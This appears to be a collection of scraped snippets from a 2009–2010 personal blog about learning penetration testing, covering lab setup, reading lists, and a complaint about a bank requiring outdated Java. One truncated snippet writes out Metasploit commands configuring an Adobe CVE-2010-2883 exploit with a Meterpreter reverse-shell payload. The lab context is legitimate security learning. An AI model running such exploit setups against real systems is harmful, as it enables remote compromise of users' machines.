pentest-n00b.blogspot.com
Pentest N00b
http://pentest-n00b.blogspot.com/2009/08/well-past-few-weeks-have-been-little.html
Monday, 24 August 2009. Well the past few weeks have been a little busy @ work so have not had much time to further my knowledge. I have managed to read about and try to understand how exploits are found and how the exploiter alters the application code to enable an exploit to run in an application, this was mainly utilising the buffer overflow method. There are some nice tutorials here @ Peter Van Eeckhouttes Blog. Http:/ www.corelan.be:8800/. Catch you all soon. Subscribe to: Post Comments (Atom).
pentest-n00b.blogspot.com
Pentest N00b: Re Think On Pentest Lab - We Go Totally Open Source
http://pentest-n00b.blogspot.com/2010/07/re-think-on-pentest-lab-we-go-totally.html
Thursday, 8 July 2010. Re Think On Pentest Lab - We Go Totally Open Source. Having played around with my previous Virtual Pentest Lab and found it more than up to the job, Citrix's Xenserver is after all the best Virtualisation system around and for not very much money or free if you don't need the fancy extra's - I have a 2 node Xenserver system with an OPenFiler SAN at the office without the essentials licence and it makes life sooooo easy. Give it a try and watch this space for future developments.
pentest-n00b.blogspot.com
Pentest N00b: Welcome To The Pentest N00b
http://pentest-n00b.blogspot.com/2009/08/welcome-to-pentest-n00b.html
Friday, 7 August 2009. Welcome To The Pentest N00b. This is my first post on my new blog, hopefully this is were I'll attempt to map my progress as a Pentester N00b. I've already started on the road to enlightenment, I've bought some books, I got a netbook with backtrack 4 on it and I've been following some respected blogs, listening to podcasts and reading on security websites - I'll elaborate on the above in future posts. Hope this is gonna be a pleasant journey through the security universe.
pentest-n00b.blogspot.com
Pentest N00b: September 2010
http://pentest-n00b.blogspot.com/2010_09_01_archive.html
Wednesday, 15 September 2010. New Adobe 0day - CVE-2010-2883. Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why. I started out by running up Metasploit and setting up the exploit. Msf use exploit/windows/browser/adobe cooltype sing. Msf exploit(adobe cooltype sing) set PAYLOAD windows/meterpreter/reverse tcp. PAYLOAD = windows/meterpreter/reverse tcp. Msf exploit(adobe cooltype sing) set LHOST 192.168.0.79. Msf exploit(adobe coo...
pentest-n00b.blogspot.com
Pentest N00b: Upcoming Pentest Lab
http://pentest-n00b.blogspot.com/2010/01/upcoming-pentest-lab.html
Tuesday, 5 January 2010. Having read the latest blog posts from Syn Junkie, I have decided to setup my own pentest lab. Following Syn's recommendations I have decided to to lean on virtualization to provide the basis for my lab. I too have 3 laptops, 1 x Lenovo Thinkpad Z61p running Citrix Xenserver 5.5.0. 1 x Lenovo Thinkpad X60s running Ubuntu 9.10 and KVM. 1 x ASUS EEEPC 1000HE Hackbook running Backtrack 4. I look forward to publishing my exploits with my new Pentesting lab. View my complete profile.
pentest-n00b.blogspot.com
Pentest N00b: July 2010
http://pentest-n00b.blogspot.com/2010_07_01_archive.html
Thursday, 8 July 2010. Re Think On Pentest Lab - We Go Totally Open Source. Having played around with my previous Virtual Pentest Lab and found it more than up to the job, Citrix's Xenserver is after all the best Virtualisation system around and for not very much money or free if you don't need the fancy extra's - I have a 2 node Xenserver system with an OPenFiler SAN at the office without the essentials licence and it makes life sooooo easy. Give it a try and watch this space for future developments.
pentest-n00b.blogspot.com
Pentest N00b: January 2010
http://pentest-n00b.blogspot.com/2010_01_01_archive.html
Tuesday, 5 January 2010. Having read the latest blog posts from Syn Junkie, I have decided to setup my own pentest lab. Following Syn's recommendations I have decided to to lean on virtualization to provide the basis for my lab. I too have 3 laptops, 1 x Lenovo Thinkpad Z61p running Citrix Xenserver 5.5.0. 1 x Lenovo Thinkpad X60s running Ubuntu 9.10 and KVM. 1 x ASUS EEEPC 1000HE Hackbook running Backtrack 4. I look forward to publishing my exploits with my new Pentesting lab. Subscribe to: Posts (Atom).
pentest-n00b.blogspot.com
Pentest N00b: August 2009
http://pentest-n00b.blogspot.com/2009_08_01_archive.html
Monday, 24 August 2009. Well the past few weeks have been a little busy @ work so have not had much time to further my knowledge. I have managed to read about and try to understand how exploits are found and how the exploiter alters the application code to enable an exploit to run in an application, this was mainly utilising the buffer overflow method. There are some nice tutorials here @ Peter Van Eeckhouttes Blog. Http:/ www.corelan.be:8800/. Catch you all soon. Friday, 7 August 2009. Creating Real Loo...
pentest-n00b.blogspot.com
Pentest N00b: CitiBank Forces Users To Install In-Secure Software
http://pentest-n00b.blogspot.com/2010/07/citibank-forces-users-to-install-in.html
Thursday, 8 July 2010. CitiBank Forces Users To Install In-Secure Software. For some years now I have known that Citibank CitiDirect web login for online banking will only work with certain out of date JRE versions, the reason for this knowledge is the company I work for have CitiBank accounts. Now since JAVA's JRE has recently been found to be vulnerable to remote code execution this could have been a problem, but we expect that CitiBank would sort things out. Subscribe to: Post Comments (Atom). Java si...
pentest-n00b.blogspot.com
Pentest N00b: So Much Information - http://myne-us.blogspot.com/
http://pentest-n00b.blogspot.com/2010/08/so-much-information-httpmyne.html
Thursday, 5 August 2010. So Much Information - http:/ myne-us.blogspot.com/. Just had to post a link to a fantastic blog I was pointed to from a twitter post by nullthreat. This blog post gives a Pen-testing course of learning, awesome reading lists and website/blogs to visit. I'm gonna be an avid reader here for some time to come. Http:/ myne-us.blogspot.com/. Subscribe to: Post Comments (Atom). View my complete profile. Http:/ www.attackvector.org/. Http:/ www.ethicalhacker.net/. Command Line Kung Fu.